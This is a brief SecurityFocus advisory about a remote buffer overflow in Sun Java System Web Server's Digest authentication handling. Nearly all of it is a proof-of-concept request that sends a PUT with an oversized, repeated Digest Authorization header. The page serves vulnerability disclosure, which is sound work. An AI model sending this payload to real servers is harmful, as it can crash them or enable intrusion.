Sun Java System Web Server Digest Authentication Remote Buffer Overflow Vulnerability

The following example request is available:

buf = "PUT / HTTP/1.0\n"
buf += "Authorization: Digest "
buf += "ABCD,"*1000
buf += "\n\n"


 

Privacy Statement
Copyright 2010, SecurityFocus